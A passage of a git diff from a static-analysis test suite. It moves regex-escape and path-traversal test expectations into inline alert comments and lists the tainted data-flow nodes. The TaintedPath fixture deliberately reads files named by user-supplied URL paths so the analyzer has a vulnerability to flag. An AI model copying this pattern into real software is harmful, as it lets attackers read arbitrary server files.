used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:12:39:12:40 | '\\P' is equivalent to just 'P', so the sequence is not a character class | The escape sequence '\\P' is equivalent to just 'P', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:12:45:12:46 | '\\S' is equivalent to just 'S', so the sequence is not a character class | The escape sequence '\\S' is equivalent to just 'S', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:13:11:13:12 | '\\1' is equivalent to just '1', so the sequence is not a backreference | The escape sequence '\\1' is equivalent to just '1', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:13:13:14 | '\\2' is equivalent to just '2', so the sequence is not a backreference | The escape sequence '\\2' is equivalent to just '2', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:15:13:16 | '\\3' is equivalent to just '3', so the sequence is not a backreference | The escape sequence '\\3' is equivalent to just '3', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:17:13:18 | '\\4' is equivalent to just '4', so the sequence is not a backreference | The escape sequence '\\4' is equivalent to just '4', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:19:13:20 | '\\5' is equivalent to just '5', so the sequence is not a backreference | The escape sequence '\\5' is equivalent to just '5', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:21:13:22 | '\\6' is equivalent to just '6', so the sequence is not a backreference | The escape sequence '\\6' is equivalent to just '6', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:23:13:24 | '\\7' is equivalent to just '7', so the sequence is not a backreference | The escape sequence '\\7' is equivalent to just '7', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:25:13:26 | '\\8' is equivalent to just '8', so the sequence is not a backreference | The escape sequence '\\8' is equivalent to just '8', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:27:13:28 | '\\9' is equivalent to just '9', so the sequence is not a backreference | The escape sequence '\\9' is equivalent to just '9', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:13:31:13:32 | '\\-' is equivalent to just '-', so the sequence may still represent a meta-character | The escape sequence '\\-' is equivalent to just '-', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:13:8:13:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | +| tst-escapes.js:14:17:14:18 | '\\$' is equivalent to just '$', so the sequence may still represent a meta-character | The escape sequence '\\$' is equivalent to just '$', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:21:14:22 | '\\^' is equivalent to just '^', so the sequence may still represent a meta-character | The escape sequence '\\^' is equivalent to just '^', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:25:14:26 | '\\*' is equivalent to just '*', so the sequence may still represent a meta-character | The escape sequence '\\*' is equivalent to just '*', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:27:14:28 | '\\(' is equivalent to just '(', so the sequence may still represent a meta-character | The escape sequence '\\(' is equivalent to just '(', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:29:14:30 | '\\)' is equivalent to just ')', so the sequence may still represent a meta-character | The escape sequence '\\)' is equivalent to just ')', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:14:33:14:34 | '\\+' is equivalent to just '+', so the sequence may still represent a meta-character | The escape sequence '\\+' is equivalent to just '+', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:14:8:14:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | +| tst-escapes.js:15:9:15:10 | '\\[' is equivalent to just '[', so the sequence may still represent a meta-character | The escape sequence '\\[' is equivalent to just '[', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | +| tst-escapes.js:15:11:15:12 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | +| tst-escapes.js:15:18:15:19 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | +| tst-escapes.js:16:9:16:10 | '\\{' is equivalent to just '{', so the sequence may still represent a meta-character | The escape sequence '\\{' is equivalent to just '{', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:16:11:16:12 | '\\}' is equivalent to just '}', so the sequence may still represent a meta-character | The escape sequence '\\}' is equivalent to just '}', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:16:17:16:18 | '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character | The escape sequence '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:16:23:16:24 | '\\?' is equivalent to just '?', so the sequence may still represent a meta-character | The escape sequence '\\?' is equivalent to just '?', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | +| tst-escapes.js:39:9:39:10 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:39:8:39:11 | "\\." | regular expression | +| tst-escapes.js:54:10:54:11 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:54:8:54:13 | "[\\.]" | regular expression | +| tst-escapes.js:55:12:55:13 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:55:8:55:17 | "a[b\\.c]d" | regular expression | +| tst-escapes.js:58:9:58:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:58:8:58:19 | `\\k\\\\k\\d\\\\d` | regular expression | +| tst-escapes.js:58:14:58:15 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:58:8:58:19 | `\\k\\\\k\\d\\\\d` | regular expression | +| tst-escapes.js:59:9:59:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:59:8:59:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | +| tst-escapes.js:59:20:59:21 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:59:8:59:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | +| tst-escapes.js:62:9:62:10 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:62:8:62:11 | "\\]" | regular expression | +| tst-escapes.js:67:13:67:14 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:67:8:67:15 | "\\\\\\\\\\]" | regular expression | +| tst-escapes.js:71:17:71:18 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:71:8:71:19 | "\\\\\\\\\\\\\\\\\\]" | regular expression | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref index 57187b21edf7..6898c59b4d29 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.qlref @@ -1 +1,2 @@ -Security/CWE-020/UselessRegExpCharacterEscape.ql \ No newline at end of file +query: Security/CWE-020/UselessRegExpCharacterEscape.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index 4e2dcd674e79..b65448ec41b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -1,5 +1,3 @@ -// (the lines of this file are not annotated with alert expectations) - // no backslashes RegExp("abcdefghijklmnopqrstuvxyz"); RegExp("ABCDEFGHIJKLMNOPQRSTUVXYZ"); @@ -10,12 +8,12 @@ RegExp("{}\"|<>?"); RegExp(" "); // backslashes -RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); -RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); -RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); -RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); -RegExp("\[\]\'\\,\.\/"); -RegExp("\{\}\\\"\|\<\>\?"); +RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); // $ Alert +RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); // $ Alert +RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); // $ Alert +RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); // $ Alert +RegExp("\[\]\'\\,\.\/"); // $ Alert +RegExp("\{\}\\\"\|\<\>\?"); // $ Alert RegExp("\ "); /\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\u\v\\x\y\z"/; /\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z/; @@ -38,7 +36,7 @@ RegExp("\\\\\\\\\a"); RegExp("\\\\\\\\\\a"); // string vs regexp -RegExp("\.") +RegExp("\.") // $ Alert "\."; // other @@ -53,21 +51,21 @@ RegExp("^\\\\Q\\\\E$"); RegExp("/\\*"); RegExp("/\ "); -RegExp("[\.]"); -RegExp("a[b\.c]d"); +RegExp("[\.]"); // $ Alert +RegExp("a[b\.c]d"); // $ Alert RegExp("\b"); RegExp(`\b`); -RegExp(`\k\\k\d\\d`) -RegExp(`\k\\k${foo}\d\\d`) +RegExp(`\k\\k\d\\d`) // $ Alert +RegExp(`\k\\k${foo}\d\\d`) // $ Alert // effective escapes -RegExp("\]") +RegExp("\]") // $ Alert RegExp("\\]") RegExp("\\\]"); // effectively escaped after all RegExp("x\\\]"); // effectively escaped after all RegExp("\\\\]") -RegExp("\\\\\]") +RegExp("\\\\\]") // $ Alert RegExp("\\\\\\]") RegExp("\\\\\\\]") // effectively escaped after all RegExp("\\\\\\\\]") -RegExp("\\\\\\\\\]") +RegExp("\\\\\\\\\]") // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql deleted file mode 100644 index 0183ac6ade66..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql +++ /dev/null @@ -1,9 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TaintedPathQuery -deprecated import utils.test.ConsistencyChecking - -deprecated class TaintedPathConsistency extends ConsistencyConfiguration { - TaintedPathConsistency() { this = "TaintedPathConsistency" } - - override DataFlow::Node getAnAlert() { TaintedPathFlow::flowTo(result) } -} diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index f7c6d172ead2..573302c33cc5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -4,8 +4,7 @@ import { parse } from 'url'; import { join } from 'path'; var server = createServer(function(req, res) { - let path = parse(req.url, true).query.path; + let path = parse(req.url, true).query.path; // $ Source - // BAD: This could read any file on the file system - res.write(readFileSync(join("public", path))); + res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 8f1786508a59..2c19dc96c898 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected @@ -1,661 +1,331 @@ -nodes -| TaintedPath-es6.js:7:7:7:44 | path | semmle.label | path | -| TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | semmle.label | parse(req.url, true) | -| TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | -| TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | -| TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | semmle.label | join("public", path) | -| TaintedPath-es6.js:10:41:10:44 | path | semmle.label | path | -| TaintedPath.js:9:7:9:48 | path | semmle.label | path | -| TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | -| TaintedPath.js:12:29:12:32 | path | semmle.label | path | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | -| TaintedPath.js:15:45:15:48 | path | semmle.label | path | -| TaintedPath.js:18:33:18:36 | path | semmle.label | path | -| TaintedPath.js:21:33:21:36 | path | semmle.label | path | -| TaintedPath.js:24:33:24:36 | path | semmle.label | path | -| TaintedPath.js:33:31:33:34 | path | semmle.label | path | -| TaintedPath.js:38:3:38:44 | path | semmle.label | path | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:38:20:38:26 | req.url | semmle.label | req.url | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:42:48:42:51 | path | semmle.label | path | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | -| TaintedPath.js:46:45:46:48 | path | semmle.label | path | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:48:51:48:54 | path | semmle.label | path | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:50:50:50:53 | path | semmle.label | path | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| TaintedPath.js:52:52:52:55 | path | semmle.label | path | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | -| TaintedPath.js:54:49:54:52 | path | semmle.label | path | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:56:48:56:51 | path | semmle.label | path | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:58:54:58:57 | path | semmle.label | path | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | semmle.label | pathMod ... h(path) | -| TaintedPath.js:60:57:60:60 | path | semmle.label | path | -| TaintedPath.js:65:31:65:70 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:65:31:65:76 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:65:63:65:69 | req.url | semmle.label | req.url | -| TaintedPath.js:66:31:66:68 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:66:31:66:74 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:66:61:66:67 | req.url | semmle.label | req.url | -| TaintedPath.js:67:31:67:67 | require ... eq.url) | semmle.label | require ... eq.url) | -| TaintedPath.js:67:31:67:73 | require ... ).query | semmle.label | require ... ).query | -| TaintedPath.js:67:60:67:66 | req.url | semmle.label | req.url | -| TaintedPath.js:75:48:75:60 | req.params[0] | semmle.label | req.params[0] | -| TaintedPath.js:84:6:84:47 | path | semmle.label | path | -| TaintedPath.js:84:13:84:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:84:13:84:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:84:13:84:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:84:23:84:29 | req.url | semmle.label | req.url | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | semmle.label | fs.real ... c(path) | -| TaintedPath.js:86:44:86:47 | path | semmle.label | path | -| TaintedPath.js:87:14:87:17 | path | semmle.label | path | -| TaintedPath.js:88:32:88:39 | realpath | semmle.label | realpath | -| TaintedPath.js:89:45:89:52 | realpath | semmle.label | realpath | -| TaintedPath.js:120:6:120:47 | path | semmle.label | path | -| TaintedPath.js:120:13:120:36 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:120:13:120:42 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:120:13:120:47 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:120:23:120:29 | req.url | semmle.label | req.url | -| TaintedPath.js:122:23:122:26 | path | semmle.label | path | -| TaintedPath.js:126:7:126:48 | path | semmle.label | path | -| TaintedPath.js:126:14:126:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:126:14:126:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:126:14:126:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:126:24:126:30 | req.url | semmle.label | req.url | -| TaintedPath.js:128:19:128:22 | path | semmle.label | path | -| TaintedPath.js:130:7:130:29 | split | semmle.label | split | -| TaintedPath.js:130:15:130:18 | path | semmle.label | path | -| TaintedPath.js:130:15:130:29 | path.split("/") | semmle.label | path.split("/") | -| TaintedPath.js:132:19:132:23 | split | semmle.label | split | -| TaintedPath.js:132:19:132:33 | split.join("/") | semmle.label | split.join("/") | -| TaintedPath.js:136:19:136:23 | split | semmle.label | split | -| TaintedPath.js:136:19:136:26 | split[x] | semmle.label | split[x] | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | semmle.label | prefix + split[x] | -| TaintedPath.js:137:28:137:32 | split | semmle.label | split | -| TaintedPath.js:137:28:137:35 | split[x] | semmle.label | split[x] | -| TaintedPath.js:139:7:139:38 | concatted | semmle.label | concatted | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | semmle.label | prefix.concat(split) | -| TaintedPath.js:139:33:139:37 | split | semmle.label | split | -| TaintedPath.js:140:19:140:27 | concatted | semmle.label | concatted | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | semmle.label | concatted.join("/") | -| TaintedPath.js:142:7:142:39 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:142:20:142:24 | split | semmle.label | split | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | semmle.label | split.concat(prefix) | -| TaintedPath.js:143:19:143:28 | concatted2 | semmle.label | concatted2 | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | semmle.label | concatted2.join("/") | -| TaintedPath.js:145:19:145:23 | split | semmle.label | split | -| TaintedPath.js:145:19:145:29 | split.pop() | semmle.label | split.pop() | -| TaintedPath.js:150:7:150:48 | path | semmle.label | path | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:150:24:150:30 | req.url | semmle.label | req.url | -| TaintedPath.js:154:29:154:32 | path | semmle.label | path | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:160:29:160:32 | path | semmle.label | path | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:161:29:161:32 | path | semmle.label | path | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:162:29:162:32 | path | semmle.label | path | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:163:29:163:32 | path | semmle.label | path | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | semmle.label | path.re ... /g, '') | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | semmle.label | "prefix ... +/, '') | -| TaintedPath.js:178:40:178:43 | path | semmle.label | path | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | semmle.label | path.re ... +/, '') | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | semmle.label | pathMod ... +/, '') | -| TaintedPath.js:179:50:179:53 | path | semmle.label | path | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | semmle.label | qs.parse(req.url) | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | semmle.label | qs.pars ... rl).foo | -| TaintedPath.js:187:38:187:44 | req.url | semmle.label | req.url | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | semmle.label | qs.pars ... q.url)) | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | semmle.label | qs.pars ... l)).foo | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | semmle.label | normali ... eq.url) | -| TaintedPath.js:188:51:188:57 | req.url | semmle.label | req.url | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | semmle.label | parseqs ... eq.url) | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | semmle.label | parseqs ... rl).foo | -| TaintedPath.js:190:44:190:50 | req.url | semmle.label | req.url | -| TaintedPath.js:195:7:195:48 | path | semmle.label | path | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:195:24:195:30 | req.url | semmle.label | req.url | -| TaintedPath.js:196:31:196:34 | path | semmle.label | path | -| TaintedPath.js:197:45:197:48 | path | semmle.label | path | -| TaintedPath.js:198:35:198:38 | path | semmle.label | path | -| TaintedPath.js:202:7:202:48 | path | semmle.label | path | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:202:24:202:30 | req.url | semmle.label | req.url | -| TaintedPath.js:206:29:206:32 | path | semmle.label | path | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:211:7:211:48 | path | semmle.label | path | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:211:24:211:30 | req.url | semmle.label | req.url | -| TaintedPath.js:213:29:213:32 | path | semmle.label | path | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| TaintedPath.js:216:31:216:34 | path | semmle.label | path | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | semmle.label | path.re ... '), '') | -| examples/TaintedPath.js:8:7:8:52 | filePath | semmle.label | filePath | -| examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | semmle.label | url.par ... , true) | -| examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | semmle.label | url.par ... ).query | -| examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| examples/TaintedPath.js:8:28:8:34 | req.url | semmle.label | req.url | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | semmle.label | ROOT + filePath | -| examples/TaintedPath.js:11:36:11:43 | filePath | semmle.label | filePath | -| express.js:8:20:8:32 | req.query.bar | semmle.label | req.query.bar | -| handlebars.js:10:51:10:58 | filePath | semmle.label | filePath | -| handlebars.js:11:32:11:39 | filePath | semmle.label | filePath | -| handlebars.js:13:73:13:80 | filePath | semmle.label | filePath | -| handlebars.js:15:25:15:32 | filePath | semmle.label | filePath | -| handlebars.js:29:46:29:60 | req.params.path | semmle.label | req.params.path | -| handlebars.js:43:15:43:29 | req.params.path | semmle.label | req.params.path | -| normalizedPaths.js:11:7:11:27 | path | semmle.label | path | -| normalizedPaths.js:11:14:11:27 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:13:19:13:22 | path | semmle.label | path | -| normalizedPaths.js:14:19:14:29 | './' + path | semmle.label | './' + path | -| normalizedPaths.js:14:26:14:29 | path | semmle.label | path | -| normalizedPaths.js:15:19:15:22 | path | semmle.label | path | -| normalizedPaths.js:15:19:15:38 | path + '/index.html' | semmle.label | path + '/index.html' | -| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | -| normalizedPaths.js:16:35:16:38 | path | semmle.label | path | -| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:17:53:17:56 | path | semmle.label | path | -| normalizedPaths.js:21:7:21:49 | path | semmle.label | path | -| normalizedPaths.js:21:14:21:49 | pathMod ... y.path) | semmle.label | pathMod ... y.path) | -| normalizedPaths.js:21:35:21:48 | req.query.path | semmle.label | req.query.path | -| normalizedPaths.js:23:19:23:22 | path | semmle.label | path | -| normalizedPaths.js:24:19:24:29 | './' + path | semmle.label | './' + path | -| normalizedPaths.js:24:26:24:29 | path | semmle.label | path | -| normalizedPaths.js:25:19:25:22 | path | semmle.label | path | -| normalizedPaths.js:25:19:25:38 | path + '/index.html' | semmle.label | path + '/index.html' | -| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | semmle.label | pathMod ... .html') | -| normalizedPaths.js:26:35:26:38 | path | semmle.label | path | -| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| normalizedPaths.js:27:53:27:56 | path | semmle.label | path | -| 